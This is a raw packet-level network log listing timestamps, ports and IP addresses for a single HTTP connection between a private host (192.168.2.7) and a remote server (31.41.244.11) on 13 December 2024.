Dec 13, 2024 18:53:55.479897976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.479939938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.480798006 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.480849028 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.480881929 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.480922937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.481817007 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.481861115 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.481893063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.481935024 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.482805014 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.482850075 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.482913017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.482954979 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.483824968 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.483869076 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.483906031 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.483953953 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.484870911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.484919071 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.484973907 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.485019922 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.485955954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.486001968 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.486110926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.486152887 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.487132072 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.487175941 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.487255096 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.487293959 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.488230944 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.488270044 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.488291979 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.488331079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.489224911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.489269972 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.489351034 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.489389896 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.490124941 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.490175962 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.490207911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.490247965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.491000891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.491041899 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.491075993 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.491115093 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.492000103 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.492042065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.492099047 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.492144108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.493005037 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.493055105 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.493179083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.493223906 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.493928909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.493971109 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.632874966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.633054018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.633101940 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.633143902 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.633147955 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.633187056 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.633471966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.633517027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.633554935 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.633593082 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.634448051 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.634493113 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.634557962 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.634601116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.635499954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.635541916 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.635545015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.635584116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.636454105 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.636512041 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.636522055 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.636569977 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.637439966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.637486935 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.637523890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.637572050 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.638504028 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.638550997 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.638684034 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.638727903 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.639532089 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.639583111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.639614105 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.639659882 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.640477896 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.640527010 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.640584946 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.640630960 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.641489029 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.641546011 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.641629934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.641695023 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.642574072 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.642617941 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.642662048 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.642700911 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.643640041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.643683910 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.643723011 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.643769026 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.644575119 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.644623041 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.644676924 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.644716978 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.645561934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.645634890 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.645662069 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.645706892 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.646574020 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.646616936 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.646693945 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.646735907 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.647588968 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.647629023 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.647684097 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.647722960 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.648628950 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.648670912 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.648705006 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.648746014 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.649631023 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.649677038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.649758101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.649799109 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.650721073 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.650759935 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.650852919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.650895119 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.651707888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.651750088 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.651791096 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.651830912 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.652642012 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.652682066 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.652724028 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.652765036 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.653652906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.653692961 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.653772116 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.653810978 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.654654980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.654699087 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.654794931 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.654834986 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.655782938 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.655834913 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.655905008 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.655950069 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.656681061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.656723976 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.656790018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.656833887 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.657777071 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.657830000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.657835007 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.657880068 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.658727884 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.658776045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.658807039 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.658854008 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.659759998 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.659801006 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.659878969 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.659917116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.660892963 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.660933018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.660972118 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.661011934 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.661844969 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.661886930 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.661892891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.661926985 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.662801981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.662842035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.662972927 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.663016081 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.663846970 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.663887978 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.663944006 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.663983107 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.664861917 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.664902925 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.664932966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.664973974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.665906906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.665955067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.665957928 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.665999889 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.666853905 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.666902065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.667037010 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.667081118 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.667860985 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.667907953 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.667946100 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.667984009 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.668915987 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.668962955 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.668993950 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.669035912 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.669894934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.669940948 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.670001030 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.670044899 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.670926094 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.670969963 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.671010017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.671051025 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.672018051 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.672061920 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.672142982 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.672182083 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.672940016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.672979116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.673033953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.673074007 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.673937082 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.673978090 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.674154997 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.674196959 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.675055981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.675096035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.675188065 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.675226927 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.676017046 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.676067114 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.676259041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.676310062 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.677026987 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.677078009 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.677129030 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.677181005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.678092003 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.678133965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.678200960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.678241968 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.679007053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.679049969 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.679116964 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.679155111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.680018902 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.680058956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.680125952 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.680166960 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.681193113 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.681235075 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.681390047 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.681432009 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.682169914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.682212114 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.682243109 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.682281017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.683120966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.683162928 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.683186054 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.683227062 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.684107065 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.684150934 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.684182882 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.684222937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.685106993 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.685146093 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.685182095 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.685219049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.829864025 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.829935074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.829992056 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.830038071 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.830190897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.830238104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.830248117 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.830293894 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.831280947 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.831324100 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.831352949 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.831396103 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.832176924 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.832222939 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.832290888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.832331896 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.833179951 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.833228111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.833261013 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.833309889 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.834199905 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.834240913 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.834331989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.834378958 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.835179090 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.835228920 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.835294962 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.835340977 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.836942911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.836958885 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.836996078 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.837016106 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.837196112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.837241888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.837336063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.837383032 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.838212967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.838259935 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.838326931 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.838366985 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.839243889 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.839298964 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.839402914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.839449883 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.840260983 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.840307951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.840339899 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.840380907 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.841382027 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.841430902 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.841463089 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.841509104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.842314959 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.842364073 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.842401028 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.842444897 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.843337059 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.843377113 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.843401909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.843440056 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.844322920 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.844372988 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.844463110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.844507933 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.845376015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.845427036 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.845463991 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.845509052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.846354008 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.846395016 CET	49917	80	192.168.2.7	31.41.244.11
